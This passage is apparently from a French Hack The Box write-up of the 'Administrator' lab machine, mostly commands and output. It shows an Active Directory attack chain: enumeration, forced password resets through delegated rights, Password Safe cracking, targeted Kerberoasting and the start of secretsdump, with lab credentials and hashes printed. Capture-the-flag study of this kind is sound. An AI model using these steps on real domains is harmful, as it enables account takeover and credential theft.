class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap 10.10.11.42 -sV -sC -T4 -Pn </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-11-30 18:52 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> administrator.htb <span class="o">(</span>10.10.11.42<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.072s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">988</span> closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp Microsoft ftpd </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-syst: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ SYST: Windows_NT </span></span><span class="line"><span class="cl">53/tcp open domain Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-12-01 06:52:33Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: administrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: administrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped </span></span><span class="line"><span class="cl">Service Info: Host: DC<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-01T06:52:40 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: 7h00m02s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 21.37 seconds </span></span></code></pre></td></tr></table> </div> </div><h3 id="rpcclient-enumusers">rpcclient enumusers </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">rpcclient -U Olivia%ichliebedich 10.10.11.42 -c <span class="s2">&#34;enumdomusers&#34;</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>Administrator<span class="o">]</span> rid:<span class="o">[</span>0x1f4<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>Guest<span class="o">]</span> rid:<span class="o">[</span>0x1f5<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>krbtgt<span class="o">]</span> rid:<span class="o">[</span>0x1f6<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>olivia<span class="o">]</span> rid:<span class="o">[</span>0x454<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>michael<span class="o">]</span> rid:<span class="o">[</span>0x455<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>benjamin<span class="o">]</span> rid:<span class="o">[</span>0x456<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>emily<span class="o">]</span> rid:<span class="o">[</span>0x458<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>ethan<span class="o">]</span> rid:<span class="o">[</span>0x459<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>alexander<span class="o">]</span> rid:<span class="o">[</span>0xe11<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>emma<span class="o">]</span> rid:<span class="o">[</span>0xe12<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="smbclient">smbclient </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient -L //10.10.11.42 -U Olivia%ichliebedich </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.11.42 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span></code></pre></td></tr></table> </div> </div><h3 id="sharphound">SharpHound </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">upload SharpHound.ps1 . </span></span></code></pre></td></tr></table> </div> </div><h3 id="bloodhound">Bloodhound </h3><p>On importe les données obtenu. Puis on voit que Olivia a des acces generic All sur Michael. On peut alors changer son mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Olivia : Droits GenericAll sur l&#39;utilisateur Michael</span> </span></span><span class="line"><span class="cl"> Set-ADAccountPassword -Identity <span class="s2">&#34;Michael&#34;</span> -NewPassword <span class="o">(</span>ConvertTo-SecureString -AsPlainText <span class="s2">&#34;azertyazerty&#34;</span> -Force<span class="o">)</span> -Reset </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Connexion avec le compte de Michael</span> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u Michael -p azertyazerty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Michael : Droits ForceChangePassword</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## D&#39;abord, il faut ajouter PowerView.ps1 pour obtenir certaines commandes dans</span> </span></span><span class="line"><span class="cl"><span class="c1">## le powershell de Evil-Winrm</span> </span></span><span class="line"><span class="cl">upload PowerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On load powerview dans le powershell</span> </span></span><span class="line"><span class="cl"><span class="c1">## On met un &#34;.&#34; devant pour charger dans l&#39;environnement powershell actuelle et pas dans un sous-environnement</span> </span></span><span class="line"><span class="cl">. .<span class="se">\P</span>owerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Changement du mot de passe de Benjamin</span> </span></span><span class="line"><span class="cl">Set-DomainUserPassword -Identity Benjamin -AccountPassword <span class="o">(</span>ConvertTo-SecureString <span class="s1">&#39;azertyazerty&#39;</span> -AsPlainText -Force<span class="o">)</span> -Verbose </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Connexion avec l&#39;utilisateur Benjamin</span> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u Benjamin -p azertyazerty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## RIEN !</span> </span></span><span class="line"><span class="cl">smbclient </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## FTP</span> </span></span><span class="line"><span class="cl">ftp 10.10.11.42 </span></span><span class="line"><span class="cl">&gt; get Backup.psafe3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="bruteforce-backuppsafe3">Bruteforce Backup.psafe3 </h3><p>On bruteforce le password maitre du fichier Backup.psafe3 qui est un fichier password safe. Pour cela, on utilise <code>hashcat</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5200</span> -a <span class="m">0</span> Backup.psafe3 ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">OpenCL API <span class="o">(</span>OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG<span class="o">)</span> - Platform <span class="c1">#1 [The pocl project]</span> </span></span><span class="line"><span class="cl"><span class="o">=====================================================================================================================================</span> </span></span><span class="line"><span class="cl">* Device <span class="c1">#1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 6839/13742 MB (2048 MB allocatable), 8MCU</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Minimum password length supported by kernel: <span class="m">0</span> </span></span><span class="line"><span class="cl">Maximum password length supported by kernel: <span class="m">256</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Hashes: <span class="m">1</span> digests<span class="p">;</span> <span class="m">1</span> unique digests, <span class="m">1</span> unique salts </span></span><span class="line"><span class="cl">Bitmaps: <span class="m">16</span> bits, <span class="m">65536</span> entries, 0x0000ffff mask, <span class="m">262144</span> bytes, 5/13 rotates </span></span><span class="line"><span class="cl">Rules: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Optimizers applied: </span></span><span class="line"><span class="cl">* Zero-Byte </span></span><span class="line"><span class="cl">* Single-Hash </span></span><span class="line"><span class="cl">* Single-Salt </span></span><span class="line"><span class="cl">* Slow-Hash-SIMD-LOOP </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Watchdog: Temperature abort trigger <span class="nb">set</span> to 90c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host memory required <span class="k">for</span> this attack: <span class="m">2</span> MB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: /home/leopold/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139922195</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Backup.psafe3:tekieromucho </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">5200</span> <span class="o">(</span>Password Safe v3<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: Backup.psafe3 </span></span><span class="line"><span class="cl">Time.Started.....: Thu Nov <span class="m">28</span> 15:13:47 <span class="m">2024</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Thu Nov <span class="m">28</span> 15:13:47 <span class="m">2024</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>/home/leopold/wordlists/rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#1.........: <span class="m">27754</span> H/s <span class="o">(</span>5.85ms<span class="o">)</span> @ Accel:64 Loops:1024 Thr:1 Vec:8 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests </span></span><span class="line"><span class="cl">Progress.........: 5120/14344385 <span class="o">(</span>0.04%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/5120 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 4608/14344385 <span class="o">(</span>0.03%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#1....: Liverpool -&gt; babygrl </span></span><span class="line"><span class="cl">Hardware.Mon.#1..: Temp: 60c Util: 22% </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Thu Nov <span class="m">28</span> 15:13:27 <span class="m">2024</span> </span></span><span class="line"><span class="cl">Stopped: Thu Nov <span class="m">28</span> 15:13:48 <span class="m">2024</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passwordsafe">PasswordSafe </h3><p>On installe <code>pwsafe</code> puis on ouvre la base de donnée avec le mot de passe trouvé <strong>tekieromucho</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo apt isntall pwsafe </span></span><span class="line"><span class="cl">pwsafe ./Backup.psafe3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl">emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl">emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">./nxc smb 10.10.11.42 -u <span class="s1">&#39;emily&#39;</span> -p <span class="s1">&#39;UXLCI5iETUsIBoFVTj8yQFKoHjXmb&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.42 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:administrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.42 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> administrator.htb<span class="se">\e</span>mily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag">User flag </h3><p>Finalement, on obtient le flag utilisateur grâce à Emily</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily<span class="se">\D</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">3415.....de32 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="emily---ethan">Emily -&gt; Ethan </h3><p>On doit faire un kerberosting. D&rsquo;après le write-up, il y avait une manière plus simple de le faire grace a ce repo github qui fait toutes les etapes qu&rsquo;on a effectué à la main d&rsquo;un coup:</p> <blockquote> <p>git clone <a class="link" href="https://github.com/ShutdownRepo/targetedKerberoast" target="_blank" rel="noopener" >https://github.com/ShutdownRepo/targetedKerberoast</a></p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Depuis Emily evilWinrm</span> </span></span><span class="line"><span class="cl">. .<span class="se">\P</span>owerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Set-DomainObject -Identity Ethan -Set @<span class="o">{</span><span class="nv">serviceprincipalname</span><span class="o">=</span><span class="s1">&#39;fakeService/targetHost&#39;</span><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Depuis Kali</span> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Downloads<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo ntpdate administrator.htb </span></span><span class="line"><span class="cl">2024-11-29 16:04:44.623613 <span class="o">(</span>-0500<span class="o">)</span> +25200.766571 +/- 0.493670 administrator.htb 10.10.11.42 s1 no-leap </span></span><span class="line"><span class="cl">CLOCK: <span class="nb">time</span> stepped by 25200.766571 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Downloads<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ GetUserSPNs.py administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -request </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hashcat -m <span class="m">13100</span> -a <span class="m">0</span> ethan_hash.txt ~/wordlists/rockyou.txt --optimized-kernel-enable --show leopold@leopold-ZenBook-UX434FAC-UX434FA </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>ethan<span class="nv">$ADMINISTRATOR</span>.HTB<span class="nv">$administrator</span>.htb/ethan*<span class="nv">$78</span>ac2707afa86369c7b7ac6481d4f104<span class="nv">$90702</span>b9d78c06a35af5186690e4534b9432409b6e97765e513071ac185c0547c06cb3a2bf9b7268791819e21671adc50267d2233c02f05a3528d9a3341a87a2f470a8b7cf56a3d326751f9def7e0ba074bc3898d2159339e52406c576ce48895c687ad7460ed922d25a7f311197ab8ba2dd2f407690371cea35ab9509f4323aef68705ff3a735d7a461691040e3f6cee60cf8872450c1915429bc741357983166310c5664995fbb6d2e94d555c8ecd59e01f951860d21da3adda55559976f5472be684af958d97e449d1359f5c21e24cd684a1b4db78ff6386b7b02dcecc7bec3bd3b073ac659d50f2e168563a99ff4e8a75460d653acc88eda530e4de755074de68faa776a437a45ce3a681e63edd36130040528f02bf655f8b2ef8fdac61d33c10c10573f4641551d55a950bc13ca30d4dbe622be89f6296f0d330352910d3df0d4c659408a422dbba104e64d3e061a9a182167250a3943ad22a24aceb2e7c51a2e76fc14125c88fb0990601a8f28b2ee96da6da4cf743800c7777e0549fa84d96504a8e250deeb266786714f9d3aa19fcb0f60cf60b788f6def223a11dfda0e0bbbbff61293d7c30925f7f743494f9950fd6684d6f60ab77494e726a75178cf7112b961665ea10213fbb40702faa66dcecd6c7be70738ee8d6e25bafc67962d7aa43cb4a36eb367ecffe26060cc38f411d26e41a3a37ea0d62e3be77d42daee37a277ac464d8b1e2b3d2b5587d2ef0bac76a15009361f4d5256be13b408617cf910a9faa14d1f7997fe85c51ee20f0977fd60381b815f0acff3cb3d4b6a1a6ff72f0d75d03190ed77c663cdd6cc2c11f87916456861d928554bc0cea4f2b05ea58afff209e19964ad6a5e69c2775a17645f61e39c24dd3b9705272580e72db2438ee10e26ce49cedcc6d40727d8d9eb839db1029fbe39d197208829689909afca82def5d5143bf5e80d7486bace7c1ce7364615030fe65555f03f8fc90791c3d3760feaa03e7e6c9b4654e80ccb1bc5803bb3735e17b3e025fccd1e510aff673cd9d17bb03d1ffd1a7ffaf60b730a619263ed6b67af39efff762026ef683e8b0d330c1f1da452383fab9acb9c652257b3400e2190f4603361cf61f7d187d15a71702bbc95eec7838de2ae64584e64d8ee59de45de529a913f473a52a312dd66b3645b1b0d001147ad744436b8cfdb72af6dc5defe880a6170c24ee592d53f3b8874678c202be3fdcc5b412b59b5800fcd25641bbb8e443f1b94f25c206a628ef448eb0d205b0cf7ec9c90374d53f20fff82be21a8002a6de850eeb67e16e0e6e0022ecaa54ef7ef46c0b0bf38d819c28863e1611d6112b08683ae1ac7c3cee339587b502e83369f27b7b445964fa6efb504fec49f0c5a319aa341273a50902ee8531e27b289afa18c617eaa5d806303d723045102267a39773e6da6e1e4949cf3fdcea35174107c6205feb621037c4dcb074a3b3684434ca2da040e93e981ad3f12e7bb106a9bc2824f5ac151556eaea4a97a972deb5da307d67938fe59:limpbizkit </span></span></code></pre></td></tr></table> </div> </div><p>On obtient les creds de Ethan:<code>limpbizkit</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">rpcclient -U <span class="s2">&#34;administrator.htb\ethan%limpbizkit&#34;</span> 10.10.11.42 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ldapsearch -x -H ldap://10.10.11.42 -D <span class="s2">&#34;ethan@administrator.htb&#34;</span> -w <span class="s2">&#34;limpbizkit&#34;</span> -b <span class="s2">&#34;DC=administrator,DC=htb&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Tentatives d&#39;ouvertur d&#39;un shell</span> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.42 -u ethan -p limpbizkit </span></span><span class="line"><span class="cl">$ wmiexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span><span class="line"><span class="cl">$ psexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span><span class="line"><span class="cl">$ dcomexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="secretsdump">Secretsdump </h3><p>On récupère le hash de l&rsquo;administrateur grâce au script secretsdump et aux droits de l&rsquo;utilisateur ethan.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 